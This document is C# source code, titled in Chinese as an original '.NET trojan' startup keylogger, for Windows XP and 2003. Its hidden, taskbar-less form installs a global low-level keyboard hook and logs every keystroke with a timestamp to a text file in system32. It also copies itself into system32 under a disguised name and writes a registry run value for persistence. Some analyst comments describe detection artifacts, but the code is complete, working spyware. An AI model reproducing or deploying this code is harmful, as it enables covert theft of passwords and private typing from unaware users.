.net木马的实现-开机键盘记录 (原创) 源代码
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
using System.Threading;
namespace 开机键盘记录
{
/// <summary>
/// Main form of the sample. The designer settings give it a zero-height client
/// area, start it minimized and keep it out of the taskbar, so it presents no
/// usable window. Its Load handler runs the startup sequence: relocate the
/// executable, write the registry value, start the log file and install the
/// keyboard hook.
/// Analyst note: the artifacts named in this file are
/// "c://windows//system32//_system.exe" (relocated binary) and
/// "c:/windows/system32/keyReport.txt" (keystroke log), together with a process
/// that holds a WH_KEYBOARD_LL hook while showing no taskbar entry.
/// </summary>
public class Form1 : System.Windows.Forms.Form
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.Container components = null;
// Wrapper around the SetWindowsHookEx keyboard hook.
private Hook MyHook;
// Appends captured key events to the log file.
private Report MyReport;
// Moves the executable and writes the registry value.
private RegistryReport MyRegistryReport;
// Last event kind and key name, stored as text before being logged.
private string keyEvents,keyDate;
/// <summary>
/// Builds the form and creates the three helper objects. Nothing is installed
/// or written here; that happens in Form1_Load.
/// </summary>
public Form1()
{
//
// Required for Windows Forms designer support
//
InitializeComponent();
MyHook = new Hook();
MyReport = new Report();
MyRegistryReport = new RegistryReport();
}
/// <summary>
/// Cleans up all resources in use. On a managed dispose the keyboard hook is
/// removed before the designer components are disposed.
/// </summary>
protected override void Dispose( bool disposing )
{
if( disposing )
{
this.MyHook.UnHook();
if (components != null)
{
components.Dispose();
}
}
base.Dispose( disposing );
}
#region Windows 窗体设计器生成的代码
/// <summary>
/// Required method for designer support - do not modify the contents of this
/// method with the code editor.
/// </summary>
private void InitializeComponent()
{
//
// Form1
//
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
// Height 0, no taskbar button and a minimized start state: the form is
// effectively invisible to the logged-on user.
this.ClientSize = new System.Drawing.Size(104, 0);
this.Name = "Form1";
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
this.Load += new System.EventHandler(this.Form1_Load);
}
#endregion
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main()
{
Application.Run(new Form1());
}
/// <summary>
/// Startup sequence, run once when the form loads: move the executable, write
/// the registry value, write the log header, install the hook, then subscribe
/// to its key events. None of these calls is wrapped in error handling here.
/// </summary>
private void Form1_Load(object sender, System.EventArgs e)
{
this.MyRegistryReport.MoveFile();
this.MyRegistryReport.registryRun();
this.MyReport.FirstWrite();
this.MyHook.SetHook();
this.MyHook.KeyboardEvent += new KeyboardEventHandler(MyHook_KeyboardEvent);
}
/// <summary>
/// Receives every key event raised by the hook, converts the event kind and
/// the key to their enum names and passes both strings to the log writer.
/// </summary>
private void MyHook_KeyboardEvent(KeyboardEvents keyEvent, Keys key)
{
this.keyEvents = keyEvent.ToString();
this.keyDate = key.ToString();
this.MyReport.WriteDate(keyEvents,keyDate);
}
}
}
using System;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Windows.Forms;
namespace 开机键盘记录
{
/// <summary>
/// Keyboard message kinds handled by the hook procedure. The numeric values
/// match the Windows messages WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN and
/// WM_SYSKEYUP, which is what the hook receives in wParam.
/// </summary>
public enum KeyboardEvents
{
KeyDown = 0x0100,
KeyUp = 0x0101,
SystemKeyDown = 0x0104,
SystemKeyUp = 0x0105
}
/// <summary>
/// Managed copy of the structure that lParam points to in the low-level
/// keyboard hook callback; hookProc fills it with Marshal.PtrToStructure.
/// Only vkCode is read elsewhere in this file.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct KeyboardHookStruct
{
public int vkCode; // virtual-key code, in the range 1 to 254
public int scanCode; // hardware scan code
public int flags;
public int time;
public int dwExtraInfo;
}
/// <summary>
/// Signature of the callback that Hook raises for each captured key event:
/// the event kind and the key converted to System.Windows.Forms.Keys.
/// </summary>
public delegate void KeyboardEventHandler(KeyboardEvents keyEvent ,System.Windows.Forms.Keys key);
/// <summary>
/// P/Invoke wrapper that installs a WH_KEYBOARD_LL hook through
/// SetWindowsHookEx and raises KeyboardEvent for every key-down and key-up
/// message it receives. Each message is still forwarded with CallNextHookEx,
/// so typing behaves normally for the user while it is being observed.
/// Analyst note: a process that imports SetWindowsHookEx from User32.dll and
/// requests hook type 13 with thread id 0, without presenting a window, is the
/// behaviour to look for in API monitoring or static import analysis.
/// </summary>
public class Hook
{
// Raised from hookProc for each key event that passes the message filter.
public event KeyboardEventHandler KeyboardEvent;
/// <summary>
/// Hook type identifiers accepted by SetWindowsHookEx. Only WH_KEYBOARD_LL is
/// used in this file.
/// </summary>
public enum HookType
{
WH_JOURNALRECORD = 0,
WH_JOURNALPLAYBACK = 1,
WH_KEYBOARD = 2,
WH_GETMESSAGE = 3,
WH_CALLWNDPROC = 4,
WH_CBT = 5,
WH_SYSMSGFILTER = 6,
WH_MOUSE = 7,
WH_HARDWARE = 8,
WH_DEBUG = 9,
WH_SHELL = 10,
WH_FOREGROUNDIDLE = 11,
WH_CALLWNDPROCRET = 12,
WH_KEYBOARD_LL = 13,
WH_MOUSE_LL = 14,
WH_MSGFILTER = -1,
}
// Managed signature of the native hook callback.
public delegate IntPtr HookProc(int code, int wParam, IntPtr lParam);
// Native User32 entry points: install a hook, pass a message on to the next
// hook in the chain, and remove a hook.
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern IntPtr SetWindowsHookEx(HookType hookType,HookProc hook,IntPtr instance,int threadID);
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern IntPtr CallNextHookEx(IntPtr hookHandle, int code, int wParam, IntPtr lParam);
[DllImport("User32.dll",CharSet = CharSet.Auto)]
public static extern bool UnhookWindowsHookEx(IntPtr hookHandle);
// Module handle passed to SetWindowsHookEx.
private IntPtr instance;
// Handle returned by SetWindowsHookEx; IntPtr.Zero until SetHook runs.
private IntPtr hookHandle;
// Thread id passed to SetWindowsHookEx; always 0 in this file.
private int threadID;
// Delegate instance for hookProc, created once and handed to the native API.
private HookProc hookProcEx;
/// <summary>
/// Prepares the hook parameters without installing anything: the module handle
/// of the executing assembly's first module, thread id 0 (the hook is not tied
/// to one thread), an empty hook handle and the callback delegate.
/// </summary>
public Hook()
{
this.instance =
Marshal.GetHINSTANCE(Assembly.GetExecutingAssembly().GetModules()[0]);
this.threadID = 0;
hookHandle = IntPtr.Zero;
hookProcEx = new HookProc(hookProc);
}
/// <summary>
/// Installs the low-level keyboard hook and stores its handle.
/// </summary>
/// <returns>true when SetWindowsHookEx returned a non-zero handle.</returns>
public bool SetHook()
{
this.hookHandle = SetWindowsHookEx(HookType.WH_KEYBOARD_LL,hookProcEx,this.instance,this.threadID);
return ((int)hookHandle != 0);
}
/// <summary>
/// Hook callback. For code >= 0 and one of the four KeyboardEvents message
/// kinds, it copies the native structure behind lParam, converts vkCode to
/// Keys and raises KeyboardEvent. Every path ends by forwarding the message
/// with CallNextHookEx, so no keystroke is suppressed.
/// </summary>
/// <param name="code">Hook code supplied by Windows; negative values are only forwarded.</param>
/// <param name="wParam">Keyboard message identifier, compared against KeyboardEvents.</param>
/// <param name="lParam">Pointer to the native keyboard hook structure.</param>
/// <returns>The value returned by CallNextHookEx.</returns>
public IntPtr hookProc(int code, int wParam, IntPtr lParam)
{
if(code >= 0)
{
KeyboardEvents kEvent = (KeyboardEvents)wParam;
// Any message other than the four key-down/key-up kinds is forwarded
// without being reported.
if (kEvent != KeyboardEvents.KeyDown &&
kEvent != KeyboardEvents.KeyUp &&
kEvent != KeyboardEvents.SystemKeyDown &&
kEvent != KeyboardEvents.SystemKeyUp)
{
return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam);
}
// Copy the native structure into managed memory and report the key.
KeyboardHookStruct MyKey = new KeyboardHookStruct();
Type t = MyKey.GetType();
MyKey = (KeyboardHookStruct)Marshal.PtrToStructure(lParam,t);
Keys keyData=(Keys)MyKey.vkCode;
KeyboardEvent(kEvent, keyData);
}
return CallNextHookEx(this.hookHandle,(int)HookType.WH_KEYBOARD_LL,wParam, lParam);
}
/// <summary>
/// Removes the hook identified by the stored handle.
/// </summary>
/// <returns>The result of UnhookWindowsHookEx.</returns>
public bool UnHook()
{
return Hook.UnhookWindowsHookEx(this.hookHandle);
}
}
}
using System;
using System.IO;
using Microsoft.Win32;
using System.Windows.Forms;
namespace 开机键盘记录
{
/// <summary>
/// Relocation and registry steps of the sample: moves the running executable
/// to a fixed path under system32 and writes that path into a registry value
/// under HKEY_CURRENT_USER.
/// Analyst note: both steps leave fixed, searchable artifacts - the file name
/// "_system.exe" in system32 and a registry value whose data is that path.
/// File-integrity monitoring on system32 and registry auditing on the current
/// user's hive cover both.
/// </summary>
public class RegistryReport
{
public RegistryReport()
{
//
// TODO: add constructor logic here
//
}
/// <summary>
/// Moves the running executable to "c://windows//system32//_system.exe" unless
/// a file already exists at that path. Writing into system32 normally requires
/// administrative rights, and File.Move is not wrapped in error handling here,
/// so a failure propagates to the caller.
/// </summary>
public void MoveFile()
{
if(!File.Exists("c://windows//system32//_system.exe"))
{
File.Move(Application.ExecutablePath,"c://windows//system32//_system.exe");
}
else
return;
}
/// <summary>
/// Creates or opens a subkey of HKEY_CURRENT_USER using the path string below
/// and stores the relocated executable path as its default (unnamed) value.
/// NOTE(review): the path string is passed to CreateSubKey verbatim with "//"
/// separators; confirm on an isolated analysis host which key is actually
/// created before writing a detection that assumes a specific key.
/// </summary>
public void registryRun()
{
RegistryKey key1=Registry.CurrentUser.CreateSubKey("Software//Microsoft//Windows//CurrentVersion//run");
key1.SetValue("","c://windows//system32//_system.exe");
key1.Close();
}
}
}
using System;
using System.IO;
namespace 开机键盘记录
{
/// <summary>
/// Log writer of the sample. Appends plain-text lines to
/// "c:/windows/system32/keyReport.txt": one banner with date and time per
/// start, then one line per key event.
/// Analyst note: the log is unencrypted and grows by one append per key-down
/// and per key-up, so frequent small writes to a text file in system32 by a
/// non-system process are a useful file-monitoring signal; the banner string
/// is a fixed content marker.
/// </summary>
public class Report
{
public Report()
{
//
// TODO: add constructor logic here
//
}
/// <summary>
/// Appends the banner line and a line holding the current date and time to
/// the log file. Unlike WriteDate, I/O errors are not caught here.
/// </summary>
public void FirstWrite()
{
// Second constructor argument true = append to the existing file.
StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true);
sw.WriteLine("************* LittleStudio Studio ************* ");
sw.WriteLine("******** " + DateTime.Today.Year.ToString() + "."
+ DateTime.Today.Month.ToString() + "."
+ DateTime.Today.Day.ToString() + " "
+ DateTime.Now.Hour.ToString() + ":"
+ DateTime.Now.Minute.ToString() + ":"
+ DateTime.Now.Second.ToString() + " ********");
sw.Close();
}
/// <summary>
/// Appends one line for a key event: key name, event kind and the current
/// time as hour:minute:second. The file is opened and closed on every call.
/// </summary>
/// <param name="keyEvents">Event kind as text (a KeyboardEvents member name).</param>
/// <param name="keyDate">Key name as text (a Keys member name).</param>
public void WriteDate(string keyEvents,string keyDate)
{
try
{
StreamWriter sw = new StreamWriter("c:/windows/system32/keyReport.txt",true);
sw.WriteLine(keyDate + "键 " + keyEvents + " "
+ DateTime.Now.Hour.ToString() + ":"
+ DateTime.Now.Minute.ToString() + ":"
+ DateTime.Now.Second.ToString());
sw.Close();
}
// Every exception is swallowed: a failed write loses the line silently.
catch{}
return;
}
}
}
在WindowsXP,2003下调试通过。